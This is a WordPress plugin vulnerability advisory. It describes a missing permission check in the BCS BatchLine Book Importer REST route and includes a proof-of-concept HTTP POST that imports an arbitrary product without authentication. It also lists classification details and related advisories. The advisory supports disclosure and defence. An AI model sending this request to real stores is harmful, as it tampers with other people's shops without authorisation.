BCS BatchLine Book Importer < 1.5.8 – Unauthenticated Product Import | Plugin Vulnerabilities

Description

The plugin did not correctly check for permission in its wc/v3/bcsbertlinebookimport REST route, allowing unauthenticated to import arbitrary products or update existing ones

Proof of Concept

POST /wp-json/wc/v3/bcsbertlinebookimport HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 200
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<books><book><isbn>123</isbn><title>Malicious Product</title><content>YOLO</content><price>0</price><stock>2</stock></book></books>

Affects Plugins

bcs-bertline-book-importer

Fixed in 1.5.8

References

URL

https://plugins.trac.wordpress.org/changeset/2546046

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

23b76562-d2af-4753-bce4-002921f3378e

Timeline

Publicly Published

2021-06-14 (about 4 years ago)

Added

2021-06-14 (about 4 years ago)

Last Updated

2021-06-14 (about 4 years ago)

Other

Published

Title

Published

2021-01-22

Title

Doneren met Mollie < 2.8.5 - Unauthorised CSV Export leading to Sensitive Data Disclosure

Published

2024-01-16

Title

User Profile Builder < 3.10.9 - Missing Authorization to Plugin Settings Change via wppb_two_factor_authentication_settings_update

Published

2021-07-19

Title

RestroPress < 2.8.3.1 - Unauthorised AJAX Calls

Published

2022-06-27

Title

miniOrange's Google Authenticator < 5.5.75 - Reflected Cross-Site Scripting

Published

2021-11-15

Title

Improved Include Page <= 1.2 - Contributor+ Arbitrary Posts/Pages Access